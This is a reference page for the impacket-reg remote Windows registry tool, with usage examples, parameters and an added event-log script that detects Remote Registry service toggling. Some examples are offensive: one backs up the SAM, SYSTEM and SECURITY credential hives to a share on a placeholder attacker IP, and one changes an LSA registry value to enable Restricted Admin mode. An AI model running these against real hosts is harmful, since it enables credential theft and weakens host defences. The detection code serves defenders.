
Linux command

impacket-reg command

Files

After copying, replace file names, directories, or parameters as needed.

Common examples

Query a registry key

impacket-reg '[domain]/[user]:[password]@[target]' query -keyName 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion'

Recursively query

impacket-reg '[domain]/[user]:[password]@[target]' query -keyName 'HKLM\SYSTEM\CurrentControlSet' -s

Query a specific value

impacket-reg '[domain]/[user]:[password]@[target]' query -keyName 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion' -v ProductName

Add a registry value

impacket-reg '[domain]/[user]:[password]@[target]' add -keyName 'HKLM\SYSTEM\CurrentControlSet\Control\Lsa' -v DisableRestrictedAdmin -vt REG_DWORD -vd 0

Delete a registry value

impacket-reg '[domain]/[user]:[password]@[target]' delete -keyName 'HKLM\SOFTWARE\TestKey' -v TestValue

Backup SAM, SYSTEM, and SECURITY hives

impacket-reg '[domain]/[user]:[password]@[target]' backup -o '\\[attacker_ip]\[share]'

Description

impacket-reg provides remote Windows registry manipulation through the MS-RRP MSRPC interface, functioning as a remote equivalent to Windows reg.exe. It can query, add, delete, and save registry keys and values on remote Windows machines. The tool automatically starts the Remote Registry service on the target if it is not running (even if disabled), and restores the original state when finished. This makes it effective even against hardened hosts where the service has been manually disabled.
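Because the service is started and then put back, the host's System event log is where this activity shows up. The following is an added example, not part of impacket or of the original page: it scans exported Service Control Manager events for a Remote Registry service that is enabled from the disabled state, run, and disabled again within a short window. It assumes English-language message text for event IDs 7040 (start type changed) and 7036 (service state changed); the sample rows, host names and the 10-minute window are constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Constructed sample rows in the shape of a System log export:
# (timestamp, host, event id, message). Not taken from a real system.
SAMPLE_EVENTS = [
    ("2024-05-01T10:00:00", "WS01", 7040, "The start type of the Remote Registry service was changed from disabled to demand start."),
    ("2024-05-01T10:00:01", "WS01", 7036, "The Remote Registry service entered the running state."),
    ("2024-05-01T10:00:09", "WS01", 7036, "The Remote Registry service entered the stopped state."),
    ("2024-05-01T10:00:10", "WS01", 7040, "The start type of the Remote Registry service was changed from demand start to disabled."),
    ("2024-05-01T11:30:00", "SRV02", 7036, "The Remote Registry service entered the running state."),
    ("2024-05-01T12:00:00", "WS01", 7036, "The Print Spooler service entered the running state."),
]

START_TYPE = re.compile(r"start type of the Remote Registry service was changed from (.+?) to (.+?)\.")
STATE = re.compile(r"The Remote Registry service entered the (running|stopped) state\.")

def find_remote_registry_toggles(events, window=timedelta(minutes=10)):
    """Return (host, enabled_at, restored_at) for each disabled -> enabled -> running -> disabled cycle within `window`."""
    findings = []
    pending = {}  # host -> {"enabled_at": datetime, "ran": bool}
    for ts, host, event_id, msg in sorted(events):
        when = datetime.fromisoformat(ts)
        if event_id == 7040 and (m := START_TYPE.search(msg)):
            old, new = m.group(1), m.group(2)
            if old == "disabled" and new != "disabled":
                pending[host] = {"enabled_at": when, "ran": False}   # cycle opens
            elif new == "disabled" and host in pending:
                cycle = pending.pop(host)                            # cycle closes
                if cycle["ran"] and when - cycle["enabled_at"] <= window:
                    findings.append((host, cycle["enabled_at"], when))
        elif event_id == 7036 and (m := STATE.search(msg)):
            if m.group(1) == "running" and host in pending:
                pending[host]["ran"] = True
    return findings

if __name__ == "__main__":
    for host, enabled_at, restored_at in find_remote_registry_toggles(SAMPLE_EVENTS):
        print(f"{host}: Remote Registry enabled {enabled_at} and re-disabled {restored_at}")
```

A service that was merely stopped rather than disabled (SRV02 in the sample) produces no start-type change, so it needs a separate rule that correlates the 7036 start with the remote logon that preceded it.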

Parameters

-debug
Turn DEBUG output on.
-ts
Add timestamp to every logging output.
-hashes _LMHASH:NTHASH_
Use NTLM hashes for authentication.
-no-pass
Do not prompt for password.
-k
Use Kerberos authentication from ccache file (KRB5CCNAME).
-aesKey _KEY_
AES key for Kerberos authentication (128 or 256 bit).
-dc-ip _IP_
IP address of the domain controller.
-target-ip _IP_
IP address of the target machine.
-port _PORT_
Destination port (139 or 445, default 445).

FAQ


How do I run a basic impacket-reg example?

Run `impacket-reg '[domain]/[user]:[password]@[target]' query -keyName 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion'` in a terminal, then adjust file names, paths, flags, or remote targets for your system.
